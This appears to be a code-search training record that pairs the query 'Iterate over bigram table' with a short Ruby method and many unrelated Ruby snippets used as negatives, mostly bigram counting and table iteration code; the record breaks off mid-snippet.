Iterate over bigram table. | def each_entry(&b)
@table.each(&b)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def each\n\t\t @table.each do |pair, bigram|\n yield(bigram)\n\t\t end\n\t\t end",
"def load_bigrams\n bigrams = []\n\n begin\n sql = \"SELECT bigram_id, word1, word2, count FROM Bigrams;\"\n stm = @db.prepare sql\n rs = stm.execute\n\t\t while (row = rs.next) do\n\t\t id, w1, w2, c = *row\n\t\t bigrams << Bigrams.new(w1, w2, :count=>c, :id=>id)\n\t\t end\n ensure\n stm.close\n end\n\n begin \n sql = \"SELECT file_path, file_count FROM BigramFiles WHERE bigram_id = ?\"\n stm = @db.prepare sql\n\n\t\t bigrams.each do |b|\n\t\t rs = stm.execute(b.id)\n\t\t files = {}\n\t\t while (row = rs.next) do\n\t\t path, count = *row\n\t\t files[path] = count\n\t\t end\n\t\t b.files = files\n\t\t end\n ensure\n stm.close\n end\n\n return bigrams\n end",
"def each\n @table.each do |_, word|\n yield(word)\n end\n end",
"def scan\n $stderr.print \"[bigrams] \"\n\n last = nil\n\n bigram_files.each do |file|\n $stderr.print \".\"\n\n text = File.read(file).gsub(\"\\n\", \" \")\n states = text.split(/[.,:;?!()\"]\\s*/)\n\n states.each do |state|\n state.scan(WORD) do |word|\n word = normalize(word)\n if valid_word?(word)\n\t\t if last && good_bigram?(word)\n add(last, word, file)\n\t\t end\n\t\t last = word\n else\n last = nil\n end\n end\n last = nil\n end\n last = nil\n end\n\n $stderr.puts\n end",
"def n_gramas\n for i in 2...8\n busca_n_gramas(i)\n end\n end",
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def matching_bigrams(word1)\n list = @index[word1]\n list.map{ |word2| @table[[word1,word2]] }\n end",
"def table\n words.scan\n bigrams.scan\n\n list = words.top_weighted(max)\n\n if sort\n list = list.sort_by{ |w| w.to_s }\n end\n\n index = {}\n list.each_with_index do |w, i|\n index[w.spelling] = i\n end\n\n tbl = []\n\n list.each_with_index do |w, i|\n s = ilog(words.weighted_probability(w))\n\n blist = bigrams.matching_bigrams(w.to_s)\n blist = blist.sort_by{ |b| bigrams.score(b) }.reverse\n blist = blist.map{ |b| b.word2 }.uniq\n\n b = []\n blist.each do |w|\n i = index[w]\n b << i+1 if i\n break if b.size == num\n end\n\n # ensure there are at least the required number of bigrams\n until b.size >= num\n b << 0\n end\n\n tbl << [s, w, b]\n end\n\n return tbl\n end",
"def each( &blk )\n @table.each( &blk )\n end",
"def iterator\n @table.iterator\n end",
"def output_table(output=$stdout)\n word_list = words.sort_by{ |w| words.rank(w) }.reverse\n\n word_list = word_list[0, MAX_WORDS]\n\n sets = []\n word_list.each_with_index do |w, i|\n bigram_list = bigrams.matching_bigrams(w.spelling)\n bigram_list = bigram_list.sort_by{ |b| bigrams.rank(b) }.reverse\n bigram_list = bigram_list.map{ |b| b.word2 }.uniq\n bigram_list = bigram_list[0,6] # maximum of six bigrams\n sets << [w.spelling] + bigram_list\n end\n\n sets.each do |w|\n output.puts(w.join(' ')) \n end\n end",
"def each_gram(&block)\n @frequencies.each_key(&block)\n end",
"def each\n while nextperm\n yield indices.map { |i| alphabet[i] }\n end\n end",
"def each &block\n db.iterinit\n loop do\n key = db.iternext or break\n val = db[key]\n yield key, val\n end\n end",
"def to_h\n words = {}\n @table.each do |words, bigram|\n words[words] = bigram.rank\n end\n words\n end",
"def iterator\n return HashTabletIterator.new(@table)\n end",
"def each\n @aln.each do | seq |\n yield seq[@col]\n end\n end",
"def load_bigrams(filename)\n #puts filename\n CSV.foreach(filename, :headers=>true) do |row|\n bigram = row['bigram']\n bigram.gsub!(' ','_')\n @bigrams << bigram\n end\n end",
"def each\n @rows.each do |row|\n row.each do |col|\n\tyield col\n end\n end\n end",
"def generate_table\n letters.reverse.each_with_index do |letter, index|\n row = build_row(letter, index)\n table << row\n table.unshift(row) unless index == 0\n end\n end",
"def iterator\n HashTableIterator.new(@table)\n end",
"def full_bigram_counts\n {\n'TH' => 116997844,\n'HE' => 100689263,\n'IN' => 87674002,\n'ER' => 77134382,\n'AN' => 69775179,\n'RE' => 60923600,\n'ES' => 57070453,\n'ON' => 56915252,\n'ST' => 54018399,\n'NT' => 50701084,\n'EN' => 48991276,\n'AT' => 48274564,\n'ED' => 46647960,\n'ND' => 46194306,\n'TO' => 46115188,\n'OR' => 45725191,\n'EA' => 43329810,\n'TI' => 42888666,\n'AR' => 42353262,\n'TE' => 42295813,\n'NG' => 38567365,\n'AL' => 38211584,\n'IT' => 37938534,\n'AS' => 37773878,\n'IS' => 37349981,\n'HA' => 35971841,\n'ET' => 32872552,\n'SE' => 31532272,\n'OU' => 31112284,\n'OF' => 30540904,\n'LE' => 30383262,\n'SA' => 30080131,\n'VE' => 29320973,\n'RO' => 29230770,\n'RA' => 28645577,\n'RI' => 27634643,\n'HI' => 27495342,\n'NE' => 27331675,\n'ME' => 27237733,\n'DE' => 27029835,\n'CO' => 26737101,\n'TA' => 26147593,\n'EC' => 25775798,\n'SI' => 25758841,\n'LL' => 24636875,\n'SO' => 23903631,\n'NA' => 23547524,\n'LI' => 23291169,\n'LA' => 23178317,\n'EL' => 23092248,\n'MA' => 21828378,\n'DI' => 21673998,\n'IC' => 21468412,\n'RT' => 21456059,\n'NS' => 21306421,\n'RS' => 21237259,\n'IO' => 21210160,\n'OM' => 21066156,\n'CH' => 20132750,\n'OT' => 20088048,\n'CA' => 19930754,\n'CE' => 19803619,\n'HO' => 19729026,\n'BE' => 19468489,\n'TT' => 19367472,\n'FO' => 18923772,\n'TS' => 18922522,\n'SS' => 18915696,\n'NO' => 18894111,\n'EE' => 18497942,\n'EM' => 18145294,\n'AC' => 17904683,\n'IL' => 17877600,\n'DA' => 17584055,\n'NI' => 17452104,\n'UR' => 17341717,\n'WA' => 16838794,\n'SH' => 16773127,\n'EI' => 16026915,\n'AM' => 15975981,\n'TR' => 15821226,\n'DT' => 15759673,\n'US' => 15699353,\n'LO' => 15596310,\n'PE' => 15573318,\n'UN' => 15237699,\n'NC' => 15214623,\n'WI' => 15213018,\n'UT' => 15137169,\n'AD' => 14877234,\n'EW' => 14776406,\n'OW' => 14610429,\n'GE' => 14425023,\n'EP' => 14024377,\n'AI' => 13974919,\n'LY' => 13742031,\n'OL' => 13726491,\n'FT' => 13696078,\n'OS' => 13596265,\n'EO' => 13524186,\n'EF' => 13252227,\n'PR' => 13191182,\n'WE' => 13185116,\n'DO' => 13120322,\n'MO' => 12950768,\n'ID' => 12896787,\n'IE' => 12505546,\n'MI' => 12168944,\n'PA' => 12068709,\n'FI' => 11993833,\n'PO' => 11917535,\n'CT' => 11888752,\n'WH' => 11852909,\n'IR' => 11681353,\n'AY' => 11523416,\n'GA' => 11239788,\n'SC' => 10800636,\n'KE' => 10650670,\n'EV' => 10574011,\n'SP' => 10570626,\n'IM' => 10544422,\n'OP' => 10459455,\n'DS' => 10429887,\n'LD' => 10245579,\n'UL' => 10173468,\n'OO' => 10168856,\n'SU' => 10031005,\n'IA' => 10002012,\n'GH' => 9880399,\n'PL' => 9812226,\n'EB' => 9738798,\n'IG' => 9530574,\n'VI' => 9380037,\n'IV' => 9129232,\n'WO' => 9106647,\n'YO' => 9088497,\n'RD' => 9025637,\n'TW' => 8910254,\n'BA' => 8867461,\n'AG' => 8809266,\n'RY' => 8788539,\n'AB' => 8775582,\n'LS' => 8675452,\n'SW' => 8673234,\n'AP' => 8553911,\n'FE' => 8529289,\n'TU' => 8477495,\n'CI' => 8446084,\n'FA' => 8357929,\n'HT' => 8351551,\n'FR' => 8339376,\n'AV' => 8288885,\n'EG' => 8286463,\n'GO' => 8188708,\n'BO' => 8172395,\n'BU' => 8113271,\n'TY' => 8008918,\n'MP' => 7835172,\n'OC' => 7646952,\n'OD' => 7610214,\n'EH' => 7559141,\n'YS' => 7539621,\n'EY' => 7528342,\n'RM' => 7377989,\n'OV' => 7350014,\n'GT' => 7347990,\n'YA' => 7239548,\n'CK' => 7205091,\n'GI' => 7103140,\n'RN' => 7064635,\n'GR' => 6989963,\n'RC' => 6974063,\n'BL' => 6941044,\n'LT' => 6817273,\n'YT' => 6714151,\n'OA' => 6554221,\n'YE' => 6499305,\n'OB' => 6212512,\n'DB' => 6106719,\n'FF' => 6085519,\n'SF' => 6073995,\n'RR' => 5896212,\n'DU' => 5861311,\n'KI' => 5814357,\n'UC' => 5742385,\n'IF' => 5740414,\n'AF' => 5702567,\n'DR' => 5701879,\n'CL' => 
5683204,\n'EX' => 5649363,\n'SM' => 5580755,\n'PI' => 5559210,\n'SB' => 5553684,\n'CR' => 5514347,\n'TL' => 5403137,\n'OI' => 5336616,\n'RU' => 5330557,\n'UP' => 5306948,\n'BY' => 5232074,\n'TC' => 5196817,\n'NN' => 5180899,\n'AK' => 5137311,\n'SL' => 4965012,\n'NF' => 4950333,\n'UE' => 4927837,\n'DW' => 4906814,\n'AU' => 4884168,\n'PP' => 4873393,\n'UG' => 4832325,\n'RL' => 4803246,\n'RG' => 4645938,\n'BR' => 4621080,\n'CU' => 4604045,\n'UA' => 4589997,\n'DH' => 4585765,\n'RK' => 4491400,\n'YI' => 4461214,\n'LU' => 4402940,\n'UM' => 4389720,\n'BI' => 4356462,\n'NY' => 4343290,\n'NW' => 4215967,\n'QU' => 4169424,\n'OG' => 4163126,\n'SN' => 4157990,\n'MB' => 4121764,\n'VA' => 4111375,\n'DF' => 4033878,\n'DD' => 4001275,\n'MS' => 3922855,\n'GS' => 3920675,\n'AW' => 3918960,\n'NH' => 3915410,\n'PU' => 3858148,\n'HR' => 3843001,\n'SD' => 3842250,\n'TB' => 3815459,\n'PT' => 3812475,\n'NM' => 3796928,\n'DC' => 3782481,\n'GU' => 3768430,\n'TM' => 3759861,\n'MU' => 3755834,\n'NU' => 3732602,\n'MM' => 3730508,\n'NL' => 3692985,\n'EU' => 3674130,\n'WN' => 3649615,\n'NB' => 3602692,\n'RP' => 3588188,\n'DM' => 3544905,\n'SR' => 3513808,\n'UD' => 3499535,\n'UI' => 3481482,\n'RF' => 3436232,\n'OK' => 3397570,\n'YW' => 3379064,\n'TF' => 3368452,\n'IP' => 3348621,\n'RW' => 3348005,\n'RB' => 3346212,\n'OH' => 3254659,\n'KS' => 3227333,\n'DP' => 3145043,\n'FU' => 3138900,\n'YC' => 3128053,\n'TP' => 3070427,\n'MT' => 3055946,\n'DL' => 3050945,\n'NK' => 3043200,\n'CC' => 3026492,\n'UB' => 2990868,\n'RH' => 2968706,\n'NP' => 2968126,\n'JU' => 2924815,\n'FL' => 2890839,\n'DN' => 2840522,\n'KA' => 2833038,\n'PH' => 2825344,\n'HU' => 2771830,\n'JO' => 2721345,\n'LF' => 2702522,\n'YB' => 2696786,\n'RV' => 2692445,\n'OE' => 2616308,\n'IB' => 2598444,\n'IK' => 2585124,\n'YP' => 2581863,\n'GL' => 2576787,\n'LP' => 2543957,\n'YM' => 2516273,\n'LB' => 2463693,\n'HS' => 2462026,\n'DG' => 2442139,\n'GN' => 2426429,\n'EK' => 2411639,\n'NR' => 2393580,\n'PS' => 2377036,\n'TD' => 2346516,\n'LC' => 2328063,\n'SK' => 2321888,\n'YF' => 2305244,\n'YH' => 2291273,\n'VO' => 2253292,\n'AH' => 2225270,\n'DY' => 2218040,\n'LM' => 2216514,\n'SY' => 2214270,\n'NV' => 2194534,\n'YD' => 2122337,\n'FS' => 2047416,\n'SG' => 2043770,\n'YR' => 2021939,\n'YL' => 2013939,\n'WS' => 1988727,\n'MY' => 1949129,\n'OY' => 1932892,\n'KN' => 1903836,\n'IZ' => 1865802,\n'XP' => 1840696,\n'LW' => 1836811,\n'TN' => 1782119,\n'KO' => 1758001,\n'AA' => 1721143,\n'JA' => 1712763,\n'ZE' => 1709871,\n'FC' => 1570791,\n'GW' => 1567991,\n'TG' => 1530045,\n'XT' => 1509969,\n'FH' => 1507604,\n'LR' => 1505092,\n'JE' => 1487348,\n'YN' => 1485655,\n'GG' => 1468286,\n'GF' => 1465290,\n'EQ' => 1461436,\n'HY' => 1446451,\n'KT' => 1443985,\n'HC' => 1441057,\n'BS' => 1409672,\n'HW' => 1403223,\n'HN' => 1383958,\n'CS' => 1381608,\n'HM' => 1353001,\n'NJ' => 1342735,\n'HH' => 1329998,\n'WT' => 1301293,\n'GC' => 1299541,\n'LH' => 1274048,\n'EJ' => 1256993,\n'FM' => 1251312,\n'DV' => 1238565,\n'LV' => 1238287,\n'WR' => 1226755,\n'GP' => 1215204,\n'FP' => 1199845,\n'GB' => 1184377,\n'GM' => 1178511,\n'HL' => 1169468,\n'LK' => 1164186,\n'CY' => 1145316,\n'MC' => 1101727,\n'YG' => 1049082,\n'XI' => 1024736,\n'HB' => 1014004,\n'FW' => 1005903,\n'GY' => 979804,\n'HP' => 978649,\n'MW' => 937621,\n'PM' => 931225,\n'ZA' => 929119,\n'LG' => 926472,\n'IW' => 922059,\n'XA' => 904148,\n'FB' => 888155,\n'SV' => 882083,\n'GD' => 879792,\n'IX' => 879360,\n'AJ' => 870262,\n'KL' => 846309,\n'HF' => 834284,\n'HD' => 828755,\n'AE' => 815963,\n'SQ' => 800346,\n'DJ' => 799366,\n'FY' => 
789961,\n'AZ' => 768359,\n'LN' => 752316,\n'AO' => 749566,\n'FD' => 748027,\n'KW' => 719633,\n'MF' => 715087,\n'MH' => 710864,\n'SJ' => 704442,\n'UF' => 701892,\n'TV' => 698150,\n'XC' => 697995,\n'YU' => 695512,\n'BB' => 689158,\n'WW' => 674610,\n'OJ' => 661082,\n'AX' => 660826,\n'MR' => 660619,\n'WL' => 657782,\n'XE' => 653947,\n'KH' => 650095,\n'OX' => 650078,\n'UO' => 649906,\n'ZI' => 644035,\n'FG' => 637758,\n'IH' => 610683,\n'TK' => 610333,\n'II' => 607124,\n'IU' => 576683,\n'TJ' => 559473,\n'MN' => 558397,\n'WY' => 553647,\n'KY' => 553296,\n'KF' => 537342,\n'FN' => 534362,\n'UY' => 531960,\n'PW' => 530411,\n'DK' => 525744,\n'RJ' => 518157,\n'UK' => 514873,\n'KR' => 507020,\n'KU' => 506618,\n'WM' => 505687,\n'KM' => 485617,\n'MD' => 481126,\n'ML' => 478528,\n'EZ' => 465466,\n'KB' => 457860,\n'WC' => 448394,\n'WD' => 432646,\n'HG' => 429607,\n'BT' => 428276,\n'ZO' => 424016,\n'KC' => 420017,\n'PF' => 418168,\n'YV' => 411487,\n'PC' => 400308,\n'PY' => 396147,\n'WB' => 394820,\n'YK' => 391953,\n'CP' => 382923,\n'YJ' => 378679,\n'KP' => 375653,\n'PB' => 369336,\n'CD' => 358435,\n'JI' => 357577,\n'UW' => 352732,\n'UH' => 339341,\n'WF' => 336213,\n'YY' => 332973,\n'WP' => 321746,\n'BC' => 320380,\n'AQ' => 315068,\n'CB' => 298053,\n'IQ' => 291635,\n'CM' => 285942,\n'MG' => 285133,\n'DQ' => 283314,\n'BJ' => 282608,\n'TZ' => 280007,\n'KD' => 277982,\n'PD' => 273162,\n'FJ' => 269865,\n'CF' => 267630,\n'NZ' => 266461,\n'CW' => 257253,\n'FV' => 244685,\n'VY' => 233082,\n'FK' => 228905,\n'OZ' => 228556,\n'ZZ' => 221275,\n'IJ' => 219128,\n'LJ' => 218362,\n'NQ' => 217422,\n'UV' => 212051,\n'XO' => 211173,\n'PG' => 211133,\n'HK' => 210385,\n'KG' => 209266,\n'VS' => 204093,\n'HV' => 197539,\n'BM' => 191807,\n'HJ' => 189906,\n'CN' => 188046,\n'GV' => 186777,\n'CG' => 181590,\n'WU' => 180884,\n'GJ' => 176947,\n'XH' => 166599,\n'GK' => 163830,\n'TQ' => 159111,\n'CQ' => 157546,\n'RQ' => 156933,\n'BH' => 154489,\n'XS' => 154347,\n'UZ' => 153736,\n'WK' => 148964,\n'XU' => 147533,\n'UX' => 144814,\n'BD' => 141752,\n'BW' => 140189,\n'WG' => 139890,\n'MV' => 136314,\n'MJ' => 134263,\n'PN' => 131645,\n'XM' => 127492,\n'OQ' => 122677,\n'BV' => 120081,\n'XW' => 119322,\n'KK' => 118811,\n'BP' => 115161,\n'ZU' => 113538,\n'RZ' => 113432,\n'XF' => 113031,\n'MK' => 111041,\n'ZH' => 107639,\n'BN' => 106125,\n'ZY' => 105871,\n'HQ' => 101241,\n'WJ' => 99435,\n'IY' => 98361,\n'DZ' => 98038,\n'VR' => 96416,\n'ZS' => 94993,\n'XY' => 94329,\n'CV' => 94224,\n'XB' => 94041,\n'XR' => 90046,\n'UJ' => 88168,\n'YQ' => 87953,\n'VD' => 85611,\n'PK' => 83017,\n'VU' => 82830,\n'JR' => 80471,\n'ZL' => 80039,\n'SZ' => 79840,\n'YZ' => 78281,\n'LQ' => 77148,\n'KJ' => 76816,\n'BF' => 75352,\n'NX' => 74844,\n'QA' => 73527,\n'QI' => 73387,\n'KV' => 73184,\n'ZW' => 68865,\n'WV' => 63930,\n'UU' => 63043,\n'VT' => 62912,\n'VP' => 62577,\n'XD' => 60101,\n'GQ' => 59750,\n'XL' => 59585,\n'VC' => 59024,\n'CZ' => 57914,\n'LZ' => 57314,\n'ZT' => 56955,\n'WZ' => 52836,\n'SX' => 50975,\n'ZB' => 50652,\n'VL' => 49032,\n'PV' => 48105,\n'FQ' => 47504,\n'PJ' => 47043,\n'ZM' => 46034,\n'VW' => 45608,\n'CJ' => 41526,\n'ZC' => 41037,\n'BG' => 40516,\n'JS' => 39326,\n'XG' => 39289,\n'RX' => 38654,\n'HZ' => 37066,\n'XX' => 35052,\n'VM' => 35024,\n'XN' => 34734,\n'QW' => 34669,\n'JP' => 34520,\n'VN' => 33082,\n'ZD' => 32906,\n'ZR' => 32685,\n'FZ' => 31186,\n'XV' => 31117,\n'ZP' => 30389,\n'VH' => 30203,\n'VB' => 29192,\n'ZF' => 28658,\n'GZ' => 28514,\n'TX' => 28156,\n'VF' => 28090,\n'DX' => 27413,\n'QB' => 27307,\n'BK' => 26993,\n'ZG' => 26369,\n'VG' => 
25585,\n'JC' => 24770,\n'ZK' => 24262,\n'ZN' => 24241,\n'UQ' => 23386,\n'JM' => 22338,\n'VV' => 22329,\n'JD' => 21903,\n'MQ' => 21358,\n'JH' => 20960,\n'QS' => 20847,\n'JT' => 20408,\n'JB' => 19380,\n'FX' => 19313,\n'PQ' => 18607,\n'MZ' => 18271,\n'YX' => 16945,\n'QT' => 16914,\n'WQ' => 16245,\n'JJ' => 16085,\n'JW' => 16083,\n'LX' => 15467,\n'GX' => 14778,\n'JN' => 14452,\n'ZV' => 14339,\n'MX' => 14250,\n'JK' => 13967,\n'KQ' => 13905,\n'XK' => 13651,\n'JF' => 12640,\n'QM' => 12315,\n'QH' => 12273,\n'JL' => 12149,\n'JG' => 12023,\n'VK' => 11469,\n'VJ' => 11432,\n'KZ' => 11192,\n'QC' => 10667,\n'XJ' => 10629,\n'PZ' => 9697,\n'QL' => 9603,\n'QO' => 9394,\n'JV' => 8925,\n'QF' => 8778,\n'QD' => 8678,\n'BZ' => 8132,\n'HX' => 7526,\n'ZJ' => 7167,\n'PX' => 6814,\n'QP' => 6062,\n'QE' => 6020,\n'QR' => 5975,\n'ZQ' => 5773,\n'JY' => 5723,\n'BQ' => 5513,\n'XQ' => 5416,\n'CX' => 5300,\n'KX' => 5083,\n'WX' => 4678,\n'QY' => 4557,\n'QV' => 4212,\n'QN' => 3808,\n'VX' => 3192,\n'BX' => 3021,\n'JZ' => 2859,\n'VZ' => 2633,\n'QG' => 2567,\n'QQ' => 2499,\n'ZX' => 2463,\n'XZ' => 2082,\n'QK' => 2023,\n'VQ' => 1488,\n'QJ' => 1342,\n'QX' => 765,\n'JX' => 747,\n'JQ' => 722,\n'QZ' => 280\n}\n end",
"def each\r\n 3.times do |i|\r\n 3.times do |j|\r\n yield(@table[i][j], i, j)\r\n end\r\n end\r\n\r\n self # Chainability! Yay!\r\n end",
"def each\n while row=self.next\n yield row\n end\n end",
"def each\n while row=self.next\n yield row\n end\n end",
"def each_cell\n\t\teach_row do |row|\n\t\t\trow.each do |cell|\n\t\t\t\tyield cell if cell\n\t\t\tend\n\t\tend\n\tend",
"def bigramate(word)\n (0..(word.length - 2)).map { |i| word.slice(i, 2) }\n end",
"def each(&block)\n table.values.each(&block)\n end",
"def tally!(file_count)\n @table.each do |words, bigram|\n bigram.tally!(table.size, file_count)\n end\n end",
"def gen_bigrams(a)\n bigrams = a.zip(a[1..-1])\n bigrams.pop # remove last useless one [lastitem, nil]\n return bigrams\nend",
"def imprime_triangulo(base)\n for linha in (1..base)\n for coluna in (1..linha)\n print \"*\"\n end\n puts\n end \nend",
"def each(&block)\n @table.values.each(&block)\n end",
"def each\n filas.times do |i|\n columnas.times do |j|\n yield self[i,j]\n end\n end\n end",
"def each( )\n\t\t\tsquares = (\"a\"..\"h\").map do |file|\n\t\t\t\t(1..8).map { |rank| \"#{file}#{rank}\" }\n\t\t\tend.flatten.each do |square|\n\t\t\t\tyield [square, @squares[square]]\n\t\t\tend\n\t\tend",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def print_letters(screen)\n (0..9).each do |multiplier|\n screen.each do |row|\n beg = 5*multiplier\n ending = 5*(multiplier+1)\n puts row[beg...ending].join\n end\n\n puts \"**************************************\"\n end\nend",
"def generate_table(grammar)\n branch_index = 0\n term_indices = grammar.terminal_indices\n columns = grammar.terminals.length + 1\n\n table = Array.new(grammar.rules.length) do\n Array.new(columns, -1)\n end\n\n grammar.rules.each_with_index do |rule, rule_index|\n rule.branches.each do |branch|\n branch.first_set.each do |step|\n # For terminals we'll base the column index on the terminal index.\n if step.is_a?(Terminal)\n terminal_index = term_indices[step]\n\n table[rule_index][terminal_index + 1] = branch_index\n\n # For the rest (= epsilon) we'll update all columns that haven't\n # been updated yet.\n else\n table[rule_index].each_with_index do |col, col_index|\n table[rule_index][col_index] = branch_index if col == -1\n end\n end\n end\n\n branch_index += 1\n end\n end\n\n return table\n end",
"def transliterate_brahmic!(time = 2, warmup = 1)\n ::Benchmark.ips do |x|\n x.config(time: time, warmup: warmup)\n TEST_STRINGS[:brahmic].to_a.product(TEST_STRINGS_FLAT.keys).each do |(ak, av), bk|\n next if ak == bk\n x.report(\"#{ak} => #{bk}\") do\n Sanscript.transliterate(av, ak, bk)\n end\n end\n x.compare!\n end\n true\n end",
"def iterateUntappdTable\n step_size = 15\n (0..getUntappdCount).step(step_size) do |i|\n db.execute(\"SELECT * FROM #{@untappdTable} LIMIT #{step_size} OFFSET #{i}\").each do |beer|\n yield BeerModel.new(beer)\n end\n end\n end",
"def each(&block)\n @pz.each do |row|\n row.each do |cell|\n yield cell\n end\n end\n end",
"def dump_bigram_info_from_hash()\n\n cumulative_bigram_count = 0\n\n $bigram_count.keys.sort.each do |bigram|\n local_lead_word = bigram.split(/\\s/)[0] #shouldn't need to extract this each time\n cumulative_bigram_count += $bigram_count[bigram]\n cumulative_proportion = cumulative_bigram_count.to_f / $lead_word_count[local_lead_word].to_f\n puts sprintf(\"%s\\t%f\", bigram, cumulative_proportion )\n end\n\nend",
"def list_bombs\n list = []\n (0..8).each do |row|\n (0..8).each do |col|\n list << [row, col] if @board[[row, col]].bomb\n end\n end\n list\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\t\t\t\t\t\t\t\t\t\t\t\t\t#for each line\n\t\t\ttitle = cleanup_title(line)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#clean up title\n\t\t\tif title != nil\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#unless the title doesnt exist\n\t\t\t\twords = title.split(/\\s/)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#split the title into seperate words and remove all the stop words mentioned in the lab\n\t\t\t\twords.delete(\"a\")\n\t\t\t\twords.delete(\"an\")\n\t\t\t\twords.delete(\"and\")\n\t\t\t\twords.delete(\"by\")\n\t\t\t\twords.delete(\"for\")\n\t\t\t\twords.delete(\"from\")\n\t\t\t\twords.delete(\"in\")\n\t\t\t\twords.delete(\"of\")\n\t\t\t\twords.delete(\"on\")\n\t\t\t\twords.delete(\"or\")\n\t\t\t\twords.delete(\"out\")\n\t\t\t\twords.delete(\"the\")\n\t\t\t\twords.delete(\"to\")\n\t\t\t\twords.delete(\"with\")\n\t\t\t\t(0..words.size-2).each do |i|\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# for the size of the words array minus two because we dont want to check bigrams of the last word\n\t\t\t\t\tif $bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"].nil?\t\t\t\t\t\t\t\t\t\t#if the first layer doesnt contain the current word, add it with it's following word with a value of 1\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"].store(\"#{words[i+1]}\", 1)\n\t\t\t\t\telse\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#otherwise, increment the value of the following key word\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"] += 1\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\t#p $bigrams.values.inspect\n\t\tend\n\t\t#puts mcw(\"a\")\n\t\tputs \"Finished. Bigram model built.\\n\"\n\t#rescue\n\t\t#STDERR.puts \"Could not open file\"\n\t\t#exit 4\n\tend\nend",
"def each\n \ti = 0\n \twhile hijos[i] != nil\n \t\tyield hijos[i]\n \t\ti += 1\n \tend\n \tend",
"def kmp_table(word)\n\t\t\tn = word.capacity\n\t\t\tunless n >= 2\n\t\t\t\traise ArgumentError.new(\"expected n >= 2 but was #{n}\")\n\t\t\tend\n\t\t\ttable = Memory.new(n)\n\t\t\ttable[1] = 0\n\t\t\ti = 0\n\t\t\tj = 1\n\t\t\twhile j + 1 < n\n\t\t\t\tif word[i].eql?(word[j])\n\t\t\t\t\ti += 1\n\t\t\t\t\tj += 1\n\t\t\t\t\ttable[j] = i\n\t\t\t\telsif i != 0\n\t\t\t\t\ti = table[i]\n\t\t\t\telse\n\t\t\t\t\tj += 1\n\t\t\t\t\ttable[j] = i\n\t\t\t\tend\n\t\t\tend\n\t\t\treturn table\n\t\tend",
"def process_file(file_name)\r\n\tputs \"Processing File.... \"\r\n\r\n\tbegin\r\n\t\tcounter = Hash.new\r\n\t\tfile = File.open(file_name)\r\n\t\tuntil file.eof?\r\n\t\t\tfile.each_line do |line|\r\n\t\t\t\t# do something for each line\r\n\t\t\t\ttitle = cleanup_title(line)\r\n\t\t\t\tunless(title == \"\")\r\n\t\t\t\t\tbigram = title.split().each_cons(2).to_a\r\n\t\t\t\t\tbigram = bigram.map{ |n| n.join(' ')}\r\n\t\t\t\t\tbigram = bigram.each_with_object(Hash.new(0)){|word, obj| obj[word] += 1}\r\n\t\t\t\t\tif bigram.any?\r\n\t\t\t\t\t\tcounter.merge!(bigram) { |k, old, new| old + new}\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\t\tfile.close\r\n\r\n\t\t$bigramsArray = counter.sort_by { |k, v| -v }\r\n\t\tcreate_hash()\r\n\t\t#$bigrams = $bigrams.to_h\r\n\r\n\t\t#$bigramsHash = Hash.new\r\n\t\t#$bigramsHash = $bigrams.to_h\r\n \t#$bigrams.each { |k, v| puts \"#{v} => #{k}\"}\r\n\r\n\r\n\t\tputs \"Finished. Bigram model built.\\n\"\r\n\trescue\r\n\t\tSTDERR.puts \"Could not open file\"\r\n\t\texit 4\r\n\tend\r\n\r\nend",
"def ngram_analysis(str, n)\r\n # use a hash to store ngram - frequency mapping\r\n freq = Hash.new\r\n bigram = \"\"\r\n count = n-1\r\n i = 0\r\n\r\n # get the first ngram\r\n for i in 0..count\r\n bigram[i] = str[i]\r\n end\r\n\r\n freq[bigram] = 1\r\n\r\n str.each_char do |char|\r\n if i>=n then\r\n\r\n # bigram, trigram or quadrigram?\r\n bigram[0] = bigram[1]\r\n if n==2 then\r\n bigram[1] = char\r\n elsif n==3 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = char\r\n elsif n==4 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = bigram[3]\r\n bigram[3] = char\r\n end\r\n\r\n # updates values in the hash\r\n if freq.key?(bigram)==false then\r\n freq[bigram] = 1\r\n else \r\n freq[bigram] = freq[bigram]+1\r\n end\r\n\r\n end\r\n i = i + 1\r\n end\r\n\r\n # sort and print\r\n freq = freq.sort_by {|_key, value| value}.reverse.to_h\r\n i=0\r\n puts \"N-gram Analysis Results:\"\r\n freq.each do |key, value|\r\n if value!=1 && i<20 then\r\n puts 